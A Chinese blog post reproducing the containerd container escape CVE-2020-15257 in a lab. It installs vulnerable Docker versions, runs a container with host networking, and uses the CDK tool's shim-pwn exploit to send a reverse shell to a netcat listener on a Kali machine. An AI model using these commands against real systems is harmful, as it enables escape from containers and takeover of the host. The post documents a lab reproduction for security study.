当前位置:首页 » 《随便一记》 » 正文

Docker 容器逃逸漏洞(CVE-2020-15257)复现_天问_Herbert555的博客

4 人参与  2022年03月06日 09:27  分类 : 《随便一记》  评论

点击全文阅读


文章目录

  • 环境准备(安装docker)
  • 漏洞复现

环境准备(安装docker)

这里我使用的新安装的ubuntu安装一个docker复现漏洞,然后用同网段的kali接收shell
在这里插入图片描述

首先给ubuntu换源(换过了就不用换了)

vim /etc/apt/sources.list

#添加源
#中科大源
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
#阿里云源
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

#然后执行
sudo apt-get update

#报错如下
Err:1 http://mirrors.ustc.edu.cn/kali kali-rolling InRelease                   
  The following signatures couldn't be verified because the public key is not available: NO_PUBKEY ED444FF07D8D0BF6

# 把这个公钥添加到服务器就行了
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys ED444FF07D8D0BF6

#然后执行
sudo apt-get update

安装有漏洞的docker版本

sudo apt-get install ca-certificates curl software-properties-common
# 添加官方GPG密钥,这一步可能需要root用户执行,ubuntu执行,sudo passwd root 然后su root即可
sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add -
# 设置稳定的存储库
sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu xenial stable"
# 安装指定版本的docker
sudo apt-get install docker-ce=5:19.03.6~3-0~ubuntu-xenial docker-ce-cli=5:19.03.6~3-0~ubuntu-xenial containerd.io=1.2.4-1

此时查看containerd版本

docker version

漏洞影响版本
containerd < 1.4.3
containerd < 1.3.9

在这里插入图片描述

漏洞复现

下载一个容器,docker换源

docker pull ubuntu:18.04

通过--net=host 作为启动参数来运行并进入一个容器:

sudo docker run -itd --net=host ubuntu:18.04 /bin/bash

进入容器

sudo docker exec -it <容器id> /bin/bash

接着在容器内执行

cat /proc/net/unix|grep -a "containerd-shim"

可看到抽象命名空间Unix域套接字
在这里插入图片描述
Poc地址,https://github.com/Xyntax/CDK/releases/tag/0.1.6

下载exp并实现反弹shell,实现docker逃逸

wget https://github.com/Xyntax/CDK/releases/download/0.1.6/cdk_v0.1.6_release.tar.gz
tar -zxvf cdk_v0.1.6_release.tar.gz
./cdk_linux_amd64 run shim-pwn 192.168.170.139 6666

在这里插入图片描述

kali开启监听

nc -lvnp 6666

成功实现逃逸获取主机shell
在这里插入图片描述


点击全文阅读


本文链接:http://m.zhangshiyu.com/post/35781.html

复现  漏洞  执行  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

关于我们 | 我要投稿 | 免责申明

Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1